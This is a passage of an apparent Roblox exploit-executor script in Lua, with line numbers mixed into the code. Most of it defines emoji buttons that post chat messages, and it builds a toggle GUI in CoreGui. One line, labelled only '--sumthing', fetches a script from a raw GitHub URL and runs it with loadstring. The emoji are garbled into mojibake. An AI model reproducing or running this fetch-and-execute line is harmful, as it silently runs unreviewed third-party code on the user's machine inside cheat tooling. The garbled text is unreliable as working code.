MoreSection:NewButton("๐Ÿ“ท", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ“ท","All")
3814
end)
3815
MoreSection:NewButton("๐Ÿ“ธ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ“ธ","All")
3816
end)
3817
MoreSection:NewButton("๐Ÿฅบ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿฅบ","All")
3818
end)
3819
MoreSection:NewButton("๐Ÿคฆโ€โ™€๏ธ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿคฆโ€โ™€๏ธ","All")
3820
end)
3821
MoreSection:NewButton("๐Ÿ’”", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ’”","All")
3822
end)
3823
MoreSection:NewButton("๐Ÿ’˜", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ’˜","All")
3824
end)
3825
MoreSection:NewButton("๐Ÿ‰", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‰","All")
3826
end)
3827
MoreSection:NewButton("๐Ÿ˜ˆ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜ˆ","All")
3828
end)
3829
MoreSection:NewButton("๐Ÿ–ค", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ–ค","All")
3830
end)
3831
MoreSection:NewButton("๐Ÿ˜ฑ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜ฑ","All")
3832
end)
3833
MoreSection:NewButton("๐Ÿ˜ก", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜ก","All")
3834
end)
3835
MoreSection:NewButton("๐Ÿ˜ ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜ ","All")
3836
end)
3837
MoreSection:NewButton("๐Ÿ˜ค", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜ค","All")
3838
end)
3839
MoreSection:NewButton("๐Ÿงšโ€โ™€๏ธ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿงšโ€โ™€๏ธ","All")
3840
end)
3841
MoreSection:NewButton("๐Ÿคฐ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿคฐ","All")
3842
end)
3843
MoreSection:NewButton("๐Ÿ‘ฉโ€๐Ÿ’ป", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‘ฉโ€๐Ÿ’ป","All")
3844
end)
3845
MoreSection:NewButton("๐Ÿ™", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ™","All")
3846
end)
3847
MoreSection:NewButton("๐Ÿ’ค", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ’ค","All")
3848
end)
3849
MoreSection:NewButton("๐Ÿฃ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿฃ","All")
3850
end)
3851
MoreSection:NewButton("๐Ÿค", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿค","All")
3852
end)
3853
MoreSection:NewButton("๐Ÿฅ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿฅ","All")
3854
end)
3855
MoreSection:NewButton("๐Ÿฆ‹", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿฆ‹","All")
3856
end)
3857
MoreSection:NewButton("๐Ÿ˜ค", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ˜ค","All")
3858
end)
3859
MoreSection:NewButton("โ˜ ๏ธ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("โ˜ ๏ธ","All")
3860
end)
3861
MoreSection:NewButton("๐ŸŒน", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐ŸŒน","All")
3862
end)
3863
MoreSection:NewButton("๐ŸŒบ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐ŸŒบ","All")
3864
end)
3865
MoreSection:NewButton("๐Ÿฆ†", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿฆ†","All")
3866
end)
3867
MoreSection:NewButton("๐Ÿฟ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿฟ","All")
3868
end)
3869
MoreSection:NewButton("๐Ÿ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ","All")
3870
end)
3871
MoreSection:NewButton("๐Ÿ”", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ”","All")
3872
end)
3873
MoreSection:NewButton("๐Ÿฅž", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿฅž","All")
3874
end)
3875
MoreSection:NewButton("๐Ÿœ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿœ","All")
3876
end)
3877
MoreSection:NewButton("๐Ÿ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ","All")
3878
end)
3879
MoreSection:NewButton("โ˜•๏ธ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("โ˜•๏ธ","All")
3880
end)
3881
MoreSection:NewButton("๐ŸŽถ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐ŸŽถ","All")
3882
end)
3883
MoreSection:NewButton("๐ŸŽต", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐ŸŽต","All")
3884
end)
3885
MoreSection:NewButton("๐Ÿซง", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿซง","All")
3886
end)
3887
MoreSection:NewButton("๐Ÿ‡ง๐Ÿ‡ซ", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‡ง๐Ÿ‡ซ","All")
3888
end)
3889
MoreSection:NewButton("๐Ÿ‡ฏ๐Ÿ‡ต", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‡ฏ๐Ÿ‡ต","All")
3890
end)
3891
MoreSection:NewButton("๐Ÿ‡ซ๐Ÿ‡ท", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‡ซ๐Ÿ‡ท","All")
3892
end)
3893
MoreSection:NewButton("๐Ÿ‡ฐ๐Ÿ‡ท", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‡ฐ๐Ÿ‡ท","All")
3894
end)
3895
MoreSection:NewButton("๐Ÿ‡ต๐Ÿ‡น", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‡ต๐Ÿ‡น","All")
3896
end)
3897
MoreSection:NewButton("๐Ÿ‡ต๐Ÿ‡น", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‡ต๐Ÿ‡น","All")
3898
end)
3899
MoreSection:NewButton("๐Ÿ‡ซ๐Ÿ‡ท", "emoji", function()game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("๐Ÿ‡ซ๐Ÿ‡ท","All")
3900
end)
3901
3902
3903
3904
3905
--toggle the ui yes
3906
local MoreSection = More:NewSection("no")
3907
3908
MoreSection:NewKeybind("Toggle ui", "toggle the ui yes", Enum.KeyCode.Insert, function()
3909
Library:ToggleUI()
3910
end)
3911
--sumthing
3912
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/uNb6892M/main/pastebin.com.uNb6892M",true))()
3913
3914
3915
3916
--Open/Klose GUI frame--
3917
local ScreenGui = Instance.new("ScreenGui")
3918
local Frame = Instance.new("Frame")
3919
local TextButton = Instance.new("TextButton")
3920
local Frame2 = Instance.new("Frame")
3921
local TextButton2 = Instance.new("TextButton")
3922
3923
ScreenGui.Parent = game.CoreGui
3924
3925
Frame.Parent = ScreenGui
3926
Frame.BackgroundColor3 = Color3.fromRGB(0,255,0)
3927
Frame.Position = UDim2.new(0.858712733, 0, 0.1050062257, 0)
3928
Frame.Size = UDim2.new(0, 90, 0, 30)
3929
Frame.Active = true
3930
Frame.Draggable = true
3931
3932
TextButton.Parent = Frame
3933
TextButton.BackgroundColor3 = Color3.fromRGB(148,0,211)
3934
TextButton.Size = UDim2.new(0, 90, 0, 30)
3935
TextButton.Font = Enum.Font.GothamBold
3936
TextButton.Text = "OPEN"
3937
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
3938
TextButton.TextSize = 22.000
3939
TextButton.MouseButton1Click:connect(function()
3940
Frame.Visible = false
3941
Frame2.Visible = true
3942
local vim = game:service("VirtualInputManager")
3943
vim:SendKeyEvent(true, "Insert", false, game)
3944
end)
3945
3946
Frame2.Parent = ScreenGui
3947
Frame2.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
3948
Frame2.Position = UDim2.new(0.858712733, 0, 0.1050062257, 0)
3949
Frame2.Size = UDim2.new(0, 90, 0, 30)
3950
Frame2.Active = true
3951
Frame2.Draggable = true
3952
3953
TextButton2.Parent = Frame2
3954
TextButton2.BackgroundColor3 = Color3.fromRGB(128, 0, 32)
3955
TextButton2.Size = UDim2.new(0, 90, 0, 30)
3956
TextButton2.Font = Enum.Font.GothamBold
3957
TextButton2.Text = "KLOSE"
3958
TextButton2.TextColor3 = Color3.fromRGB(0, 0, 0)
3959
TextButton2.TextSize = 22.000
3960
TextButton2.MouseButton1Click:connect(function()
3961
Frame2.Visible = false
3962
Frame.Visible = true
3963
local vim = game:service("VirtualInputManager")
3964
vim:SendKeyEvent(true, "Insert", false, game)
3965
end)
3966
3967
3968
3969
3970
3971
Frame.Parent.Active = true
3972
Frame.Parent.Draggable = true
3973
3974
3975
---end---